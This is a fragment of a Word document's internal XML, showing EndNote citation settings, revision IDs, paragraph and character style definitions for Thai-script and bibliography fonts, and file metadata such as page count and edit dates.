    <w:abstractNumId w:val="4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APA 7th&lt;/Style&gt;&lt;LeftDelim&gt;{&lt;/LeftDelim&gt;&lt;RightDelim&gt;}&lt;/RightDelim&gt;&lt;FontName&gt;Calibri&lt;/FontName&gt;&lt;FontSize&gt;11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vrperrr5rw5xededdeq5xedafz09v9dazxvt&quot;&gt;My EndNote Library&lt;record-ids&gt;&lt;item&gt;3&lt;/item&gt;&lt;/record-ids&gt;&lt;/item&gt;&lt;/Libraries&gt;"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00BB0852"/>
    <w:rsid w:val="00000018"/>
    <w:rsid w:val="000013E6"/>
    <w:rsid w:val="00003B5B"/>
    <w:rsid w:val="00005C9D"/>
    <w:rsid w:val="000074AD"/>
    <w:rsid w:val="000108CE"/>
    <w:rsid w:val="00025301"/>
    <w:rsid w:val="00034590"/>
    <w:rsid w:val="00037F5F"/>
    <w:rsid w:val="0004506C"/>
    <w:rsid w:val="00045840"/>
    <w:rsid w:val="00047934"/>
    <w:rsid w:val="000545A7"/>
    <w:rsid w:val="00056678"/>
    <w:rsid w:val="00056A3E"/>
    <w:rsid w:val="00062CFA"/>
    <w:rsid w:val="00065221"/>
    <w:rsid w:val="0007196B"/>
    <w:rsid w:val="0007388D"/>
    <w:rsid w:val="00082F3F"/>
    <w:rsid w:val="00083F92"/>
    <w:rsid w:val="00084759"/>
    <w:rsid w:val="000875F0"/>
    <w:rsid w:val="000A7C84"/>
    <w:rsid w:val="000B3E8D"/>
    <w:rsid w:val="000C2530"/>
    <w:rsid w:val="000C4233"/>
    <w:rsid w:val="000C7EB5"/>
    <w:rsid w:val="000D30AD"/>
    <w:rsid w:val="000D3F0D"/>
    <w:rsid w:val="000E0536"/>
    <w:rsid w:val="00103495"/>
    <w:rsid w:val="001077B2"/>
    <w:rsid w:val="00122AD5"/>
    <w:rsid w:val="00123431"/>
    <w:rsid w:val="00125814"/>
    <w:rsid w:val="001316D0"/>
    <w:rsid w:val="00142AC2"/>
    <w:rsid w:val="001446E0"/>
    <w:rsid w:val="0015493D"/>
    <w:rsid w:val="00162CB9"/>
    <w:rsid w:val="00164C3A"/>
    <w:rsid w:val="001659F0"/>
    <w:rsid w:val="00165DF2"/>
    <w:rsid w:val="001702F4"/>
    <w:rsid w:val="001849A3"/>
    <w:rsid w:val="0019089B"/>
    <w:rsid w:val="00191F51"/>
    <w:rsid w:val="00192573"/>
    <w:rsid w:val="001939AF"/>
    <w:rsid w:val="001A55D9"/>
    <w:rsid w:val="001C07E7"/>
    <w:rsid w:val="001C40CF"/>
    <w:rsid w:val="001C51FC"/>
    <w:rsid w:val="001E3163"/>
    <w:rsid w:val="001F14CA"/>
    <w:rsid w:val="001F2C0D"/>
    <w:rsid w:val="001F5F65"/>
    <w:rsid w:val="002007DF"/>
    <w:rsid w:val="00201BAA"/>
    <w:rsid w:val="002026F1"/>
    <w:rsid w:val="00223B26"/>
    <w:rsid w:val="002504D6"/>
    <w:rsid w:val="00261B80"/>
    <w:rsid w:val="002674DA"/>
    <w:rsid w:val="00276F50"/>
    <w:rsid w:val="00284200"/>
    <w:rsid w:val="0028798A"/>
    <w:rsid w:val="002A15BC"/>
    <w:rsid w:val="002A62A1"/>
    <w:rsid w:val="002A63ED"/>
    <w:rsid w:val="002B607C"/>
    <w:rsid w:val="002B67EA"/>
    <w:rsid w:val="002B6F0C"/>
    <w:rsid w:val="002C0FBC"/>
    <w:rsid w:val="002C4B50"/>
    <w:rsid w:val="002C7046"/>
    <w:rsid w:val="002E5AE0"/>
    <w:rsid w:val="002F0796"/>
    <w:rsid w:val="002F33BF"/>
    <w:rsid w:val="002F348B"/>
    <w:rsid w:val="002F412A"/>
    <w:rsid w:val="00304A10"/>
    <w:rsid w:val="003157FB"/>
    <w:rsid w:val="0032172C"/>
    <w:rsid w:val="00322D71"/>
    <w:rsid w:val="00326504"/>
    <w:rsid w:val="00331074"/>
    <w:rsid w:val="00336D04"/>
    <w:rsid w:val="0033726D"/>
    <w:rsid w:val="0034608F"/>
    <w:rsid w:val="00364E35"/>
    <w:rsid w:val="00365B24"/>
    <w:rsid w:val="00375478"/>
    <w:rsid w:val="0037666E"/>
    <w:rsid w:val="00393D85"/>
    <w:rsid w:val="00395A5B"/>
    <w:rsid w:val="0039622B"/>
    <w:rsid w:val="003962A3"/>
    <w:rsid w:val="003C076C"/>
    <w:rsid w:val="003C2236"/>
    <w:rsid w:val="003C319B"/>
    <w:rsid w:val="003C392F"/>
    <w:rsid w:val="003C3AB4"/>
    <w:rsid w:val="003C7341"/>
    <w:rsid w:val="003D70D6"/>
    <w:rsid w:val="003E1A15"/>
    <w:rsid w:val="003E4716"/>
    <w:rsid w:val="003F2405"/>
    <w:rsid w:val="003F7134"/>
    <w:rsid w:val="00401C0B"/>
    <w:rsid w:val="00405729"/>
    <w:rsid w:val="0041004D"/>
    <w:rsid w:val="00415D7E"/>
    <w:rsid w:val="0041624D"/>
    <w:rsid w:val="00417CD3"/>
    <w:rsid w:val="004243D1"/>
    <w:rsid w:val="00450773"/>
    <w:rsid w:val="00456638"/>
    <w:rsid w:val="00456A79"/>
    <w:rsid w:val="004711E4"/>
    <w:rsid w:val="00476135"/>
    <w:rsid w:val="00476E6E"/>
    <w:rsid w:val="0048356B"/>
    <w:rsid w:val="00485F96"/>
    <w:rsid w:val="004B21DA"/>
    <w:rsid w:val="004B5C47"/>
    <w:rsid w:val="004C5C9E"/>
    <w:rsid w:val="004D21F4"/>
    <w:rsid w:val="004D33B4"/>
    <w:rsid w:val="004D707B"/>
    <w:rsid w:val="004E07F8"/>
    <w:rsid w:val="004E3CE2"/>
    <w:rsid w:val="004E4EE4"/>
    <w:rsid w:val="004E5012"/>
    <w:rsid w:val="004E774D"/>
    <w:rsid w:val="00501836"/>
    <w:rsid w:val="00502651"/>
    <w:rsid w:val="005069D5"/>
    <w:rsid w:val="00516B60"/>
    <w:rsid w:val="00520405"/>
    <w:rsid w:val="00522067"/>
    <w:rsid w:val="00542B20"/>
    <w:rsid w:val="00544494"/>
    <w:rsid w:val="00551B9F"/>
    <w:rsid w:val="005565EB"/>
    <w:rsid w:val="00566066"/>
    <w:rsid w:val="00567227"/>
    <w:rsid w:val="005814E2"/>
    <w:rsid w:val="00587EF1"/>
    <w:rsid w:val="005906A2"/>
    <w:rsid w:val="005A0EE3"/>
    <w:rsid w:val="005B09F0"/>
    <w:rsid w:val="005B19F5"/>
    <w:rsid w:val="005B691E"/>
    <w:rsid w:val="005C36F4"/>
    <w:rsid w:val="005C3F32"/>
    <w:rsid w:val="005C4990"/>
    <w:rsid w:val="005C7A5D"/>
    <w:rsid w:val="005D3256"/>
    <w:rsid w:val="005D42D4"/>
    <w:rsid w:val="005D7EFA"/>
    <w:rsid w:val="005E1A9B"/>
    <w:rsid w:val="005E3098"/>
    <w:rsid w:val="005F04DC"/>
    <w:rsid w:val="005F0A77"/>
    <w:rsid w:val="005F5FA3"/>
    <w:rsid w:val="005F75D1"/>
    <w:rsid w:val="00600DCB"/>
    <w:rsid w:val="00602868"/>
    <w:rsid w:val="006045F1"/>
    <w:rsid w:val="006104F2"/>
    <w:rsid w:val="006126DE"/>
    <w:rsid w:val="006140B4"/>
    <w:rsid w:val="00617F89"/>
    <w:rsid w:val="00620E35"/>
    <w:rsid w:val="00636FA2"/>
    <w:rsid w:val="00637720"/>
    <w:rsid w:val="00637B58"/>
    <w:rsid w:val="00637E3E"/>
    <w:rsid w:val="00640FC3"/>
    <w:rsid w:val="0064191D"/>
    <w:rsid w:val="00656AB9"/>
    <w:rsid w:val="006608B2"/>
    <w:rsid w:val="00664F2A"/>
    <w:rsid w:val="006816AA"/>
    <w:rsid w:val="00692678"/>
    <w:rsid w:val="00695E55"/>
    <w:rsid w:val="006967A3"/>
    <w:rsid w:val="006A08C5"/>
    <w:rsid w:val="006A3579"/>
    <w:rsid w:val="006B1EFF"/>
    <w:rsid w:val="006C41A9"/>
    <w:rsid w:val="006C4AD9"/>
    <w:rsid w:val="006C7C68"/>
    <w:rsid w:val="006D728C"/>
    <w:rsid w:val="006E5B00"/>
    <w:rsid w:val="006F5115"/>
    <w:rsid w:val="006F5CD6"/>
    <w:rsid w:val="006F5F89"/>
    <w:rsid w:val="00703F57"/>
    <w:rsid w:val="00713781"/>
    <w:rsid w:val="00724698"/>
    <w:rsid w:val="007249B0"/>
    <w:rsid w:val="007300FF"/>
    <w:rsid w:val="00740F43"/>
    <w:rsid w:val="007413FB"/>
    <w:rsid w:val="007420ED"/>
    <w:rsid w:val="00755A4A"/>
    <w:rsid w:val="00757516"/>
    <w:rsid w:val="007627C7"/>
    <w:rsid w:val="00772EB0"/>
    <w:rsid w:val="007830DB"/>
    <w:rsid w:val="007A01DB"/>
    <w:rsid w:val="007A25AB"/>
    <w:rsid w:val="007A5573"/>
    <w:rsid w:val="007B1629"/>
    <w:rsid w:val="007B4E75"/>
    <w:rsid w:val="007D7F3D"/>
    <w:rsid w:val="00812E7B"/>
    <w:rsid w:val="008133F3"/>
    <w:rsid w:val="00817347"/>
    <w:rsid w:val="00837353"/>
    <w:rsid w:val="00841796"/>
    <w:rsid w:val="00842CAE"/>
    <w:rsid w:val="008456A7"/>
    <w:rsid w:val="00846AC6"/>
    <w:rsid w:val="00857593"/>
    <w:rsid w:val="0085764C"/>
    <w:rsid w:val="008606BE"/>
    <w:rsid w:val="00874453"/>
    <w:rsid w:val="00875C9E"/>
    <w:rsid w:val="008861DF"/>
    <w:rsid w:val="00890EE9"/>
    <w:rsid w:val="008A50B8"/>
    <w:rsid w:val="008A533A"/>
    <w:rsid w:val="008B4CC2"/>
    <w:rsid w:val="008C39FB"/>
    <w:rsid w:val="008C413B"/>
    <w:rsid w:val="008C53EE"/>
    <w:rsid w:val="008D0DFD"/>
    <w:rsid w:val="008E1F3C"/>
    <w:rsid w:val="008E5F5A"/>
    <w:rsid w:val="008F08F3"/>
    <w:rsid w:val="008F1035"/>
    <w:rsid w:val="009064D8"/>
    <w:rsid w:val="00913009"/>
    <w:rsid w:val="009155EA"/>
    <w:rsid w:val="00916724"/>
    <w:rsid w:val="009210E8"/>
    <w:rsid w:val="00924E94"/>
    <w:rsid w:val="00927E7B"/>
    <w:rsid w:val="00934EBE"/>
    <w:rsid w:val="00944957"/>
    <w:rsid w:val="00947B6F"/>
    <w:rsid w:val="00952430"/>
    <w:rsid w:val="00953631"/>
    <w:rsid w:val="00957245"/>
    <w:rsid w:val="00963496"/>
    <w:rsid w:val="0096349A"/>
    <w:rsid w:val="00963602"/>
    <w:rsid w:val="00965C06"/>
    <w:rsid w:val="00965D66"/>
    <w:rsid w:val="0097304F"/>
    <w:rsid w:val="009770CE"/>
    <w:rsid w:val="00986191"/>
    <w:rsid w:val="00990C72"/>
    <w:rsid w:val="009935BE"/>
    <w:rsid w:val="00994914"/>
    <w:rsid w:val="009A127D"/>
    <w:rsid w:val="009A1729"/>
    <w:rsid w:val="009B52D7"/>
    <w:rsid w:val="009C3A1A"/>
    <w:rsid w:val="009C4792"/>
    <w:rsid w:val="009C7503"/>
    <w:rsid w:val="009D338B"/>
    <w:rsid w:val="009D3F63"/>
    <w:rsid w:val="009D6CE1"/>
    <w:rsid w:val="009E19A5"/>
    <w:rsid w:val="00A02BDD"/>
    <w:rsid w:val="00A16422"/>
    <w:rsid w:val="00A16EC3"/>
    <w:rsid w:val="00A179C6"/>
    <w:rsid w:val="00A201A7"/>
    <w:rsid w:val="00A27C6B"/>
    <w:rsid w:val="00A3015D"/>
    <w:rsid w:val="00A365A5"/>
    <w:rsid w:val="00A53614"/>
    <w:rsid w:val="00A639C8"/>
    <w:rsid w:val="00A64E80"/>
    <w:rsid w:val="00A671D8"/>
    <w:rsid w:val="00A6780A"/>
    <w:rsid w:val="00A85593"/>
    <w:rsid w:val="00A93188"/>
    <w:rsid w:val="00A9791E"/>
    <w:rsid w:val="00AA3ABE"/>
    <w:rsid w:val="00AA5A03"/>
    <w:rsid w:val="00AA7E4A"/>
    <w:rsid w:val="00AB37CF"/>
    <w:rsid w:val="00AB649D"/>
    <w:rsid w:val="00AC5A25"/>
    <w:rsid w:val="00AD130D"/>
    <w:rsid w:val="00AD1B13"/>
    <w:rsid w:val="00AE1F66"/>
    <w:rsid w:val="00AE2109"/>
    <w:rsid w:val="00AE62AD"/>
    <w:rsid w:val="00AE6451"/>
    <w:rsid w:val="00AE65FB"/>
    <w:rsid w:val="00AE6E08"/>
    <w:rsid w:val="00AF1C35"/>
    <w:rsid w:val="00AF3007"/>
    <w:rsid w:val="00AF5C2C"/>
    <w:rsid w:val="00B04BFD"/>
    <w:rsid w:val="00B105FC"/>
    <w:rsid w:val="00B12585"/>
    <w:rsid w:val="00B207C8"/>
    <w:rsid w:val="00B221DF"/>
    <w:rsid w:val="00B22ACE"/>
    <w:rsid w:val="00B254C6"/>
    <w:rsid w:val="00B30154"/>
    <w:rsid w:val="00B307A8"/>
    <w:rsid w:val="00B32092"/>
    <w:rsid w:val="00B34C22"/>
    <w:rsid w:val="00B447FE"/>
    <w:rsid w:val="00B4697C"/>
    <w:rsid w:val="00B509FE"/>
    <w:rsid w:val="00B577D8"/>
    <w:rsid w:val="00B75F86"/>
    <w:rsid w:val="00B80176"/>
    <w:rsid w:val="00B9075B"/>
    <w:rsid w:val="00B94490"/>
    <w:rsid w:val="00B945E0"/>
    <w:rsid w:val="00BA36E4"/>
    <w:rsid w:val="00BB0852"/>
    <w:rsid w:val="00BD3EBF"/>
    <w:rsid w:val="00BE5FFD"/>
    <w:rsid w:val="00BF16BC"/>
    <w:rsid w:val="00BF30BF"/>
    <w:rsid w:val="00BF446A"/>
    <w:rsid w:val="00C0195B"/>
    <w:rsid w:val="00C031BB"/>
    <w:rsid w:val="00C06F87"/>
    <w:rsid w:val="00C127DC"/>
    <w:rsid w:val="00C12F25"/>
    <w:rsid w:val="00C1535D"/>
    <w:rsid w:val="00C22832"/>
    <w:rsid w:val="00C2482B"/>
    <w:rsid w:val="00C27FFC"/>
    <w:rsid w:val="00C34785"/>
    <w:rsid w:val="00C35100"/>
    <w:rsid w:val="00C352B8"/>
    <w:rsid w:val="00C40492"/>
    <w:rsid w:val="00C434BD"/>
    <w:rsid w:val="00C44F9C"/>
    <w:rsid w:val="00C54388"/>
    <w:rsid w:val="00C5492A"/>
    <w:rsid w:val="00C655A5"/>
    <w:rsid w:val="00C6640F"/>
    <w:rsid w:val="00C67F85"/>
    <w:rsid w:val="00C80255"/>
    <w:rsid w:val="00C84074"/>
    <w:rsid w:val="00C934E8"/>
    <w:rsid w:val="00C969B5"/>
    <w:rsid w:val="00CA361C"/>
    <w:rsid w:val="00CA55FB"/>
    <w:rsid w:val="00CB1BA0"/>
    <w:rsid w:val="00CB4484"/>
    <w:rsid w:val="00CB6A0B"/>
    <w:rsid w:val="00CB7E88"/>
    <w:rsid w:val="00CE158D"/>
    <w:rsid w:val="00CE1DBC"/>
    <w:rsid w:val="00CE6208"/>
    <w:rsid w:val="00CE7F40"/>
    <w:rsid w:val="00CF3E66"/>
    <w:rsid w:val="00CF60EA"/>
    <w:rsid w:val="00D04F67"/>
    <w:rsid w:val="00D12305"/>
    <w:rsid w:val="00D15A92"/>
    <w:rsid w:val="00D311DF"/>
    <w:rsid w:val="00D32D1C"/>
    <w:rsid w:val="00D501EE"/>
    <w:rsid w:val="00D55B02"/>
    <w:rsid w:val="00D5740A"/>
    <w:rsid w:val="00D62E11"/>
    <w:rsid w:val="00D630FB"/>
    <w:rsid w:val="00D63C30"/>
    <w:rsid w:val="00D865CB"/>
    <w:rsid w:val="00D92A68"/>
    <w:rsid w:val="00D92AD8"/>
    <w:rsid w:val="00D95D44"/>
    <w:rsid w:val="00DA3CDB"/>
    <w:rsid w:val="00DB3D99"/>
    <w:rsid w:val="00DC092D"/>
    <w:rsid w:val="00DC1B88"/>
    <w:rsid w:val="00DC3320"/>
    <w:rsid w:val="00DD06E1"/>
    <w:rsid w:val="00DD3F8F"/>
    <w:rsid w:val="00DD5691"/>
    <w:rsid w:val="00DD582A"/>
    <w:rsid w:val="00DE58A0"/>
    <w:rsid w:val="00DF3916"/>
    <w:rsid w:val="00E04805"/>
    <w:rsid w:val="00E120EE"/>
    <w:rsid w:val="00E32CD9"/>
    <w:rsid w:val="00E517DE"/>
    <w:rsid w:val="00E51C14"/>
    <w:rsid w:val="00E55088"/>
    <w:rsid w:val="00E5600D"/>
    <w:rsid w:val="00E650D1"/>
    <w:rsid w:val="00E66C0E"/>
    <w:rsid w:val="00E70A71"/>
    <w:rsid w:val="00E74658"/>
    <w:rsid w:val="00E9007E"/>
    <w:rsid w:val="00EA26C2"/>
    <w:rsid w:val="00EA3C04"/>
    <w:rsid w:val="00EA59B8"/>
    <w:rsid w:val="00EA7A1C"/>
    <w:rsid w:val="00EB6951"/>
    <w:rsid w:val="00EC02AB"/>
    <w:rsid w:val="00EC3FDE"/>
    <w:rsid w:val="00EC5222"/>
    <w:rsid w:val="00ED01AC"/>
    <w:rsid w:val="00EE19F7"/>
    <w:rsid w:val="00F01304"/>
    <w:rsid w:val="00F11DAC"/>
    <w:rsid w:val="00F17297"/>
    <w:rsid w:val="00F1782B"/>
    <w:rsid w:val="00F24C16"/>
    <w:rsid w:val="00F24D86"/>
    <w:rsid w:val="00F26E35"/>
    <w:rsid w:val="00F35583"/>
    <w:rsid w:val="00F413ED"/>
    <w:rsid w:val="00F43F14"/>
    <w:rsid w:val="00F44B93"/>
    <w:rsid w:val="00F5038D"/>
    <w:rsid w:val="00F5591A"/>
    <w:rsid w:val="00F72E16"/>
    <w:rsid w:val="00F74178"/>
    <w:rsid w:val="00F85047"/>
    <w:rsid w:val="00F85ACF"/>
    <w:rsid w:val="00F9697B"/>
    <w:rsid w:val="00F97732"/>
    <w:rsid w:val="00FA6179"/>
    <w:rsid w:val="00FC0C8C"/>
    <w:rsid w:val="00FD0772"/>
    <w:rsid w:val="00FE42CA"/>
    <w:rsid w:val="00FE6DD4"/>
    <w:rsid w:val="00FE7B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6964012"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D398A09F-4276-42D0-B797-D661555711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4C5C9E"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Angsana New" w:eastAsia="Times New Roman" w:hAnsi="Angsana New" w:cs="Angsana New"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="004C5C9E"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Angsana New" w:eastAsia="Times New Roman" w:hAnsi="Angsana New" w:cs="Angsana New"/>
      <w:b/>
      <w:bCs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65B2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3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40F43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BB0852"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Angsana New" w:eastAsia="Times New Roman" w:hAnsi="Angsana New" w:cs="Angsana New"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00BB0852"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00393D85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393D85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393D85"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="006C41A9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1F5F6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F5F65"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001F5F6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F5F65"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004C5C9E"/>
    <w:rPr>
      <w:rFonts w:ascii="Angsana New" w:eastAsia="Times New Roman" w:hAnsi="Angsana New" w:cs="Angsana New"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="4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rsid w:val="004C5C9E"/>
    <w:rPr>
      <w:rFonts w:ascii="Angsana New" w:eastAsia="Times New Roman" w:hAnsi="Angsana New" w:cs="Angsana New"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36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40F43"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EndNoteBibliographyTitle">
    <w:name w:val="EndNote Bibliography Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndNoteBibliographyTitleChar"/>
    <w:rsid w:val="00BF30BF"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndNoteBibliographyTitleChar">
    <w:name w:val="EndNote Bibliography Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EndNoteBibliographyTitle"/>
    <w:rsid w:val="00BF30BF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="EndNoteBibliography">
    <w:name w:val="EndNote Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="EndNoteBibliographyChar"/>
    <w:rsid w:val="00BF30BF"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:noProof/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EndNoteBibliographyChar">
    <w:name w:val="EndNote Bibliography Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="EndNoteBibliography"/>
    <w:rsid w:val="00BF30BF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:noProof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65B24"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="3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BE5FF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E5FFD"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20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BE5FFD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2221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927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919974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8816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55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19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7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222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784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758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33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17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64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98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40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54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09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93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88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71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819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619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9551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35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17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7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15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37</TotalTime>
  <Pages>12</Pages>
  <Words>586</Words>
  <Characters>3342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GL552VX</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ASUSGL552VX</cp:lastModifiedBy>
  <cp:revision>995</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-10-10T19:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-27T00:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>